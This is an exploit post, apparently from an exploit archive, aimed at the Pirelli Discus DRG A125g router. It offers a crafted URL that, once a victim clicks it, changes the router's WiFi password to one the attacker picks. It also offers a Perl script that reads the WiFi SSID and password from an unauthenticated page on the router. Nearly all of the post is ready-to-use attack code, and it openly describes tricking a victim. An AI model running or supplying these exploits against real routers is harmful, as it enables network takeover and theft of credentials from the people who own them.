Authored by Sebastian Magof
Code:Select All# Exploit Title: Pirelli Discus DRG A125g remote change wifi password vulnerability # Hardware: Pirelli Discus DRG A125g # Date: 2013/11/23 # Exploit Author: Sebastián Magof # Tested on: Linux/Windows # Twitter: @smagof # Greetz: Family, friends && under guys. # Special Greetz: # (\/) # (**) αlpha #(")(") #Exploit: http://10.0.0.2/wladv.wl?wlSsidIdx=0&wlHide=0&wlAuthMode=psk2&wlAuth=0&wlWep=disabled&wlWpaPsk=PASSWORDHERE&wlWpaGtkRekey=0&wlKeyBit=1&wlPreauth=1&wlWpa=tkip #info: where the parameter wlWpaPsk=PASSWORDHERE is where we will enter the password we want to put the victim wifi. If the victim clicks on the url your modem / router will reboot automatically with the new password provided by the attacker.Code:Select All#!/usr/bin/perl #Author: Sebastián Magof #Hardware: pirelli discus DRG A125g #Vulnerable file: wlbasic.html #Bug: Wifi Password Disclosure #Type: Local # (\/) # (**) ± #(")(") #usage:perl exploit.pl use LWP::UserAgent; use HTTP::Request; #begin print "\n\n************************************************************\n"; print "* Pirelli Discus ADSL DRG A125g Wifi password disclosure *\n"; print "************************************************************\n\n"; #wifi pwd disclosure file my $url = "http://10.0.0.2/wlbasic.html"; #UserAgent my $ua = LWP::UserAgent->new(); $ua->agent("Mozilla/5.0"); #Request. my $req = HTTP::Request->new(GET => $url); my $request = $ua->request($req); my $content = $request->content(); #content my ($ssi) = $content =~ m/ssid = '(.+)'/; my ($pwd) = $content =~ m/wpaPskKey = '(.+)'/; my ($enc) = $content =~ m/var wpa = '(.+)'/; #ssid+encryption method+pwd; print "Ssid: $ssi\n"; print "Encryption method: $enc\n"; print "Password: $pwd\n\n"; exit(0); __EOF__n
Pirelli Discus DRG A125g Remote Wifi Password Change 2013/11/23
Pirelli Discus DRG A125g suffers from a remote wifi password change vulnerability.
- Watchers:
- This resource is being watched by 26 members.